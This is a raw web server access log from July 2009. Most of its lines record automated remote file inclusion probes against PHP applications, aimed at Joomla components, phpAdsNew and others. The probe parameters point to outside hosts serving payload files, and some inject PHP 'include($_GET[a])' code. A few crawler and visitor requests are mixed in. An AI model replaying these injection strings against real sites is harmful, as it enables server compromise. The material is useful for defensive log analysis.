65.23.158.226 - - [26/Jul/2009:03:23:46 -0400] "GET /logs/access_log.Q109052800%20%20/?sourcedir=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:24:12 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:03:24:13 -0400] "GET /logs/access_log.Q109063000%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:03:24:27 -0400] "GET /logs/access_log.Q109061100%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:03:24:33 -0400] "GET //phpAdsNew/view.inc.php?phpAds_path=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:03:24:33 -0400] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:03:24:33 -0400] "GET /logs/access_log.Q109063000//phpAdsNew/view.inc.php?phpAds_path=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:24:42 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:03:24:54 -0400] "GET /logs/access_log.Q109061100//phpAdsNew/view.inc.php?phpAds_path=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:25:00 -0400] "GET /logs/access_log.Q109062100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:03:25:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.248.88.155 - - [26/Jul/2009:03:26:24 -0400] "GET /logs/access_log.Q109063000%20%20//phpAdsNew/view.inc.php?phpAds_path=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:26:33 -0400] "GET /logs//admin/classes/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:26:33 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:26:36 -0400] "GET //admin/classes/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:03:26:39 -0400] "GET /logs/access_log.Q109061100%20%20//phpAdsNew/view.inc.php?phpAds_path=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:26:56 -0400] "GET /logs/access_log.Q109070100%20%20//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:03:26:57 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:03:26:57 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:03:26:57 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:27:40 -0400] "GET /logs/access_log.Q109070100%20%20//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
82.195.150.228 - - [26/Jul/2009:03:27:57 -0400] "GET /logs/error_log.Q109070800/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
89.111.190.63 - - [26/Jul/2009:03:28:40 -0400] "GET /logs/access_log.Q109061200%20%20/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:03:28:53 -0400] "GET /images/_notes/download_coming_soon.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.190.63 - - [26/Jul/2009:03:28:57 -0400] "GET /logs/access_log.Q109061000%20%20///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:03:28:57 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:03:28:58 -0400] "GET ///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:03:29:15 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:30:36 -0400] "GET /logs/access_log.Q109051500//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:03:30:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
63.147.72.145 - - [26/Jul/2009:03:31:34 -0400] "GET /logs/access_log.Q109070100//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:32:48 -0400] "GET /logs/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:32:48 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:32:48 -0400] "GET /errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:03:33:38 -0400] "GET /images/over-index6_splashshlds.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
202.125.45.45 - - [26/Jul/2009:03:34:10 -0400] "GET /index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:03:34:10 -0400] "GET /logs/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:03:34:10 -0400] "GET /logs/error_log.Q109062600/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:03:34:42 -0400] "GET /logs/error_log.Q109061500/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
61.109.250.50 - - [26/Jul/2009:03:34:50 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:03:34:50 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:03:34:50 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:03:35:13 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:03:35:27 -0400] "GET /images/_notes/nav04_download_over.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:03:35:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:03:37:11 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:38:10 -0400] "GET /popup.php?path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:38:10 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:38:10 -0400] "GET /logs/popup.php?path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:03:38:39 -0400] "GET /logs/error_log.Q109060200 HTTP/1.0" 200 2764235 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.169 - - [26/Jul/2009:03:38:41 -0400] "GET /logs/error_log.Q109060200 HTTP/1.0" 200 2764235 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [26/Jul/2009:03:40:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:03:40:55 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:41:09 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:41:17 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:41:37 -0400] "GET /logs//include/write.php?dir=http://aboutav.com/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:41:37 -0400] "GET /logs/access_log.Q109063000//include/write.php?dir=http://aboutav.com/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:41:39 -0400] "GET //include/write.php?dir=http://aboutav.com/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:03:42:03 -0400] "GET /images/_notes/download_RCF_RCT_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:03:42:32 -0400] "GET /logs/access_log.Q109061300%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:03:43:38 -0400] "GET /logs/error_log.Q109071200 HTTP/1.0" 200 2780307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.125.45.45 - - [26/Jul/2009:03:43:46 -0400] "GET /logs/access_log.Q109063000/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:03:43:46 -0400] "GET /logs/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:03:43:46 -0400] "GET /index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
74.6.22.169 - - [26/Jul/2009:03:43:42 -0400] "GET /logs/error_log.Q109071200 HTTP/1.0" 200 2780307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.34.122 - - [26/Jul/2009:03:44:26 -0400] "GET /logs/access_log.Q109070600/index.php?pagina=http://theadezagroup.com//v-webmail/includes/mailaccess/monyet.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
87.106.34.122 - - [26/Jul/2009:03:44:26 -0400] "GET /index.php?pagina=http://theadezagroup.com//v-webmail/includes/mailaccess/monyet.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
87.106.34.122 - - [26/Jul/2009:03:44:26 -0400] "GET /logs/index.php?pagina=http://theadezagroup.com//v-webmail/includes/mailaccess/monyet.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
202.125.45.45 - - [26/Jul/2009:03:44:44 -0400] "GET /logs/error_log.Q109063000/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.106.34.122 - - [26/Jul/2009:03:45:01 -0400] "GET /logs/access_log.Q109052500/index.php?pagina=http://theadezagroup.com//v-webmail/includes/mailaccess/monyet.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
202.125.45.45 - - [26/Jul/2009:03:47:19 -0400] "GET /logs/error_log.Q109051900%20/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
65.23.158.226 - - [26/Jul/2009:03:47:30 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:47:30 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:47:30 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:47:34 -0400] "GET /logs/access_log.Q109060100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:03:47:20 -0400] "GET /logs/error_log.Q109061000 HTTP/1.0" 200 2143781 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.169 - - [26/Jul/2009:03:47:20 -0400] "GET /logs/access_log.Q109052300 HTTP/1.0" 200 2758218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.247 - - [26/Jul/2009:03:48:37 -0400] "GET /images/_notes/nav_store_fav_off_r1_c2.jpg.mno HTTP/1.1" 200 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:03:49:59 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:50:00 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:50:00 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
71.154.2.64 - - [26/Jul/2009:03:50:53 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
71.154.2.64 - - [26/Jul/2009:03:50:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
71.154.2.64 - - [26/Jul/2009:03:50:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
71.154.2.64 - - [26/Jul/2009:03:50:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
89.111.190.63 - - [26/Jul/2009:03:51:42 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.15.55.45 - - [26/Jul/2009:03:51:47 -0400] "GET /logs/access_log.Q109070800/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
211.15.55.45 - - [26/Jul/2009:03:51:47 -0400] "GET /article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
89.111.190.63 - - [26/Jul/2009:03:51:49 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.15.55.45 - - [26/Jul/2009:03:51:49 -0400] "GET /logs/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
69.13.208.131 - - [26/Jul/2009:03:52:13 -0400] "GET /logs/access_log.Q109052900/index.php?configFile=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.13.208.131 - - [26/Jul/2009:03:52:13 -0400] "GET /index.php?configFile=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
65.23.158.226 - - [26/Jul/2009:03:52:13 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:03:52:13 -0400] "GET /logs/index.php?configFile=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
220.231.126.252 - - [26/Jul/2009:03:52:15 -0400] "GET /logs/access_log.Q109070300/?sIncPath=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:03:52:15 -0400] "GET /?sIncPath=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:52:19 -0400] "GET /logs/access_log.Q109060100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:03:52:20 -0400] "GET /logs/?sIncPath=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 200 11066 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:52:41 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:53:51 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:53:51 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:53:51 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:53:53 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:54:02 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:54:02 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:54:03 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:54:08 -0400] "GET /logs/access_log.Q109060100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.221.130.14 - - [26/Jul/2009:03:54:09 -0400] "GET /logs/access_log.Q109062300/index.php?meio=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.14 - - [26/Jul/2009:03:54:10 -0400] "GET /index.php?meio=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
77.221.130.14 - - [26/Jul/2009:03:54:10 -0400] "GET /logs/index.php?meio=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
77.221.130.14 - - [26/Jul/2009:03:54:33 -0400] "GET /logs/error_log.Q109062300/index.php?meio=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
74.53.70.114 - - [26/Jul/2009:03:54:34 -0400] "GET /?sIncPath=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
74.53.70.114 - - [26/Jul/2009:03:54:34 -0400] "GET /logs/?sIncPath=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 200 11066 "-" "Mozilla/5.0"
74.53.70.114 - - [26/Jul/2009:03:54:34 -0400] "GET /logs/access_log.Q109070300/?sIncPath=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:03:55:11 -0400] "GET /images/_notes/nav_store_history_over_r1_c3.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.23.158.226 - - [26/Jul/2009:03:55:30 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:55:30 -0400] "GET /logs/access_log.Q109061200%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:55:30 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:55:30 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.53.70.114 - - [26/Jul/2009:03:55:35 -0400] "GET /logs/access_log.Q109070300%20%20/?sIncPath=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:56:22 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:56:23 -0400] "GET /logs/access_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.53.70.114 - - [26/Jul/2009:03:56:50 -0400] "GET /logs/access_log.Q109062200%20%20/?sIncPath=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:03:56:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1128A2429544F900BED2003+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.13.208.131 - - [26/Jul/2009:03:57:01 -0400] "GET /logs/error_log.Q109052900/index.php?configFile=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
